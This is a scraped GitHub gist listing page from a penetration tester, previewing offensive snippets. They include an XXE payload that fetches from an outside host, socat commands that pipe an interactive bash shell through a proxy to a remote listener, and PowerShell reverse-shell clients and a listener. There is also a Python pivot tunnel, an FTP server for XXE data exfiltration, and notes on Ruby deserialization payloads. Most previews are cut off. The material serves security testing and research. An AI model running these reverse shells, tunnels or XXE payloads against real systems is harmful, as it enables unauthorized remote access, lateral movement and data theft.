Skip to content

Instantly share code, notes, and snippets.

Etienne Stalmans staaldraad

Block or report user

Report or block staaldraad

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
@staaldraad
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / pyforw.py
Last active May 11, 2020
Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
View pyforw.py
#!/usr/bin/python
"""
Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 1.0 (22_01_2015)
Usage: python pyforw.py <targetIP> <targetPort> <jumpbox> <jumpboxPort>
python pyforw.py 10.1.1.1 3389 179.0.0.100 8081
"""
from socket import *
@staaldraad
staaldraad / awk_netstat.sh
Last active May 6, 2020
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@staaldraad
staaldraad / webdavserv.go
Last active May 3, 2020
A small webdav server in go
View webdavserv.go
package main
import (
"flag"
"fmt"
"log"
"net/http"
"os"
"golang.org/x/net/webdav"
@staaldraad
staaldraad / minRev.ps1
Last active Mar 13, 2020
Simple reverse shell in Powershell
View minRev.ps1
$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("> ");
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / xxeftp.py
Created Jul 2, 2015
Python FTP server for XXE
View xxeftp.py
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
View README.md

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
@staaldraad
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
You can’t perform that action at this time.